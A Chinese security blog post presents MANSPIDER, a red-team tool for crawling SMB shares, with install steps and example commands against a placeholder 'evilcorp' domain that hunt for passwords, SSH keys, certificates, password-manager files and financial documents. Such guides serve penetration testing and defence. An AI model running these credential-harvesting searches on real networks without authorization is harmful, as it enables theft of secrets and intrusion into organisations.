文章总结： 文档介绍了MANSPIDER，一款专为渗透测试和红队作战设计的SMB共享敏感信息搜集工具。它通过模拟合法SMB客户端行为，递归遍历网络共享目录，支持基于文件名、扩展名和内容关键词的精准检索，可自动抓取密码、私钥、配置文件等高价值数据。工具基于Impacket库构建，支持NTLM和Kerberos认证，具备多线程并发扫描能力，能高效处理大规模网络环境，并将结果以结构化格式导出，为横向移动和权限提升提供关键情报。 综合评分： 85 文章分类： 安全工具,内网渗透,红队,渗透测试

ManSpider：一款黑客内网快速敏感信息搜集工具

原创

网安武器库 网安武器库

网安武器库

2026年2月21日 21:40 山东

更多干货  点击蓝字 关注我们

注：本文仅供学习，坚决反对一切危害网络安全的行为。造成法律后果自行负责！

往期回顾

·Super Xray：一款基于 Xray 的漏洞扫描工具

·upload_forge：CTF利器-文件上传漏洞扫描工具

·Havoc：现代化后渗透命令与控制(C2)工具

·URLFinder：一款高效网页内部隐藏链接挖掘工具

·PCHunter：一款深度检测隐藏恶意代码的扫描工具（兼容win11）

·Web-SurvivalScan：用于快速验证资产存活的轻量化渗透测试扫描工具

介绍

      MANSPIDER 是一款面向渗透测试与红队作战场景的网络工具，其核心设计目标在于高效遍历并提取目标网络内 SMB 共享资源中的敏感信息。该工具通过模拟合法 SMB 客户端行为，以递归方式遍历共享目录，支持基于文件名、扩展名及内容关键词的精准检索，可自动抓取包含密码、私钥、配置文件等在内的高价值数据，为横向移动与权限提升提供关键情报支撑。

      在技术实现层面，MANSPIDER 依托 Impacket 库构建 SMB 协议交互能力，支持 NTLM 认证与 Kerberos 认证等多种身份验证方式，可适配复杂企业网络环境。其模块化架构支持多线程并发扫描，显著提升了大规模网络环境下的信息收集效率，同时通过灵活的输出配置，可将采集到的敏感数据以结构化格式导出，便于后续分析与利用。

安装

安装及演示过程在kali虚拟机中进行

首先安装UV

curl -LsSf https://astral.sh/uv/install.sh |sh#一键安装source$HOME/.cargo/env#重新加载环境变量

若因拦截，导致一键安装命令无法使用，可以进入

https://github.com/astral-sh/uv/releases/latest

下载图中框选的版本

之后安装MANSPIDER

输入

uv tool install git+https://github.com/blacklanternsecurity/MANSPIDER

或

pipx install git+https://github.com/blacklanternsecurity/MANSPIDER

这样就是好了

Manspider 使用 Kreuzberg 从各种文件格式中提取文本。某些格式需要额外的系统依赖：

# For OCR text extraction from images (PNG, JPEG, etc.)sudo apt install tesseract-ocr# For legacy Microsoft Office format support (.doc, .xls)# Kreuzberg uses LibreOffice for conversionsudo apt install libreoffice

使用示例

在网络中搜索可能包含信用证的文件名

（匹配的文件会自动下载到$HOME/.manspider/loot-n）

manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u bob -p Passw0rd

搜索文件名中带有“password”的电子表格

manspider share.evilcorp.local -f passw -e xlsx csv -d evilcorp -u bob -p Passw0rd

搜索包含密码的文档

manspider share.evilcorp.local -c passw -e xlsx csv docx pdf -d evilcorp -u bob -p Passw0rd

搜索有趣的文件扩展名

manspider share.evilcorp.local -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg pfx cfg conf config vmdk vhd vdi dit -d evilcorp -u bob -p Passw0rd

搜索与财务相关的文件

本示例搜索财务风格相似的文件名，包含5个或以上连续数字（例如：000202006.EFT)

manspider share.evilcorp.local --dirnames bank financ payable payment reconcil remit voucher vendor eft swift -f '[0-9]{5,}' -d evilcorp -u bob -p Passw0rd

通过文件名搜索 SSH 密钥

manspider share.evilcorp.local -e ppk rsa pem ssh rsa -o -f id_rsa id_dsa id_ed25519 -d evilcorp -u bob -p Passw0rd

按内容搜索 SSH 密钥

manspider share.evilcorp.local -e '' -c 'BEGIN .{1,10} PRIVATE KEY' -d evilcorp -u bob -p Passw0rd

搜索密码管理器文件

# .kdbx - KeePass Password Database (KeePass, KeePassXC)# .kdb - KeePass Classic Database (KeePass 1.x)# .1pif - 1Password Interchange Format (1Password)# .agilekeychain - Agile Keychain Format (1Password, deprecated)# .opvault - OPVault Format (1Password)# .lpd - LastPass Data File (LastPass)# .dashlane - Dashlane Data File (Dashlane)# .psafe3 - Password Safe Database (Password Safe)# .enpass - Enpass Password Manager Data File (Enpass)# .bwdb - Bitwarden Database (Bitwarden)# .msecure - mSecure Password Manager Data File (mSecure)# .stickypass - Sticky Password Data File (Sticky Password)# .pwm - Password Memory Data File (Password Memory)# .rdb - RoboForm Data File (RoboForm)# .safe - SafeInCloud Password Manager Data File (SafeInCloud)# .zps - Zoho Vault Encrypted Data File (Zoho Vault)# .pmvault - SplashID Safe Data File (SplashID Safe)# .mywallet - MyWallet Password Manager Data File (MyWallet)# .jpass - JPass Password Manager Data File (JPass)# .pwmdb - Universal Password Manager Database (Universal Password Manager)manspider share.evilcorp.local -e kdbx kdb 1pif agilekeychain opvault lpd dashlane psafe3 enpass bwdb msecure stickypass pwm rdb safe zps pmvault mywallet jpass pwmdb -d evilcorp -u bob -p Passw0rd

搜索证书

manspider share.evilcorp.local -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der -d evilcorp -u bob -p Passw0rd

搜索最近修改的文件

manspider share.evilcorp.local -e docx xlsx pdf --modified-after 2026-01-01 -d evilcorp -u bob -p Passw0rd

github链接

https://github.com/blacklanternsecurity/MANSPIDER

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网安武器库 网安武器库 网安武器库《ManSpider：一款黑客内网快速敏感信息搜集工具》